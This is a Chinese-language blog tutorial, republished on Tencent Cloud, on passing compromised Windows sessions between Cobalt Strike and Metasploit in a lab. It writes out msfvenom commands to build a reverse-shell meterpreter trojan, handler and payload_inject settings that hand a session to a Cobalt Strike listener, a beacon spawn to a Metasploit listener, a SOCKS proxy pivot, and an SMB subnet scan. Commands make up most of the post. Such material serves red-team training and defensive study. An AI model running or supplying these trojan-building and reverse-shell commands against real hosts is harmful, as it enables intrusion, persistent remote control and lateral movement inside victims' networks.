前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CS联动MSF

CS联动MSF

作者头像
Naraku
发布2021-07-29 10:26:54
2K0
发布2021-07-29 10:26:54
举报
文章被收录于专栏:Naraku的专栏Naraku的专栏

环境

  • 攻击机:Kali,192.168.100.2
代码语言:txt
复制
- CS:监听器端口`8080`
- MSF:监听端口`9999`靶机:Win7,

MSF上线主机给CS

场景:当MSF有了一个Session会话,利用MSF注入功能,加载CS的Payload

  • MSF需要先拿到Shell。这里使用msfvenom生成一个恶意木马,并上传到靶机
代码语言:javascript
复制
$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=<MSF_IP> lport=<MSF_Port> -f exe > msf.exe
  • MSF中开启监听,并在靶机中运行该木马
代码语言:javascript
复制
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp 
msf6 exploit(multi/handler) > set lhost <MSF_IP>
msf6 exploit(multi/handler) > set lport <MSF_Port>
msf6 exploit(multi/handler) > exploit 
  • 在CS中创建监听器
代码语言:txt
复制
- 监听器类型:`windows/beacon_http/reverse_http`
- Host修改为CS的IP,监听指定端口,等待MSF发送
  • 在MSF中,将session挂到后台
代码语言:javascript
复制
# 挂起会话
meterpreter> background

# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
msf> use exploit/windows/local/payload_inject

# 根据CS监听器类型选择对应的payload(http或者https)
msf> set payload windows/meterpreter/reverse_http

# 设置回连地址,CS_IP和监听器端口
msf> set LHOST <CS_IP>
msf> set LPORT <CS_Port>   # 前面CS监听器端口

# 指定要执行的Session
msf> set session <Session_ID>

# 设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
msf> set disablepayloadhandler true 
msf> run
  • 运行后CS上线

CS上线主机给MSF

场景:CS已上线主机,想把这个主机发送给MSF,生成一个MSF的Session

  • CS生成木马并上传到靶机,运行后主机上线
  • 打开MSF,开始监听
代码语言:javascript
复制
# 配置监听器
msf> use exploit/multi/handler

# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用64位
msf> set lhost <MSF_IP>
msf> set lport <MSF_Port>   # 设置任意端口进行监听

# 启动监听器
msf> run
  • 然后在CS上设置一个Foreign监听器MSF
代码语言:txt
复制
- IP设置为MSF的外网IP
- 端口设置为MSF监听端口
  • 在CS中右键会话,点击Spawn,选择MSF的监听器,或者在CS上线主机运行:
代码语言:javascript
复制
beacon> Spawn msf
  • 发送后MSF获得Session

CS代理给MSF

场景:CS已上线主机,通过CS开放一个socks代理,让MSF连接此代理进行内网渗透

  • 在CS上线主机Beacon中输入Socks监听端口
代码语言:javascript
复制
beacon> socks <Proxy_Prot>   # 设置任意端口进行代理
  • 在菜单栏点击view > Proxy pirots,点击Tunnel,可以看到生成对应的命令
代码语言:javascript
复制
setg Proxies socks4:<CS_IP>:<Proxy_Prot>
  • 开启MSF,输入命令进行设置代理
代码语言:javascript
复制
# MSF所有流量将走此代理
msf> setg Proxies socks4:<CS_IP>:<Proxy_Prot>

# 设置允许反向代理,即建立双向通道
# 如果通过此socks反弹shell,则需要开启,否则不推荐开启
msf> setg ReverseAllowProxy true

# 可以使用以下命令停止
msf> unsetg Proxies
  • 扫描指定网段中的445端口
代码语言:javascript
复制
msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 192.168.100.0/24   # 靶机如果有其它网段也可以扫描
msf> set threads 10
msf> run

版权属于:Naraku

本文链接:https://cloud.tencent.com/developer/article/1853850

本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 环境
  • MSF上线主机给CS
  • CS上线主机给MSF
  • CS代理给MSF
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档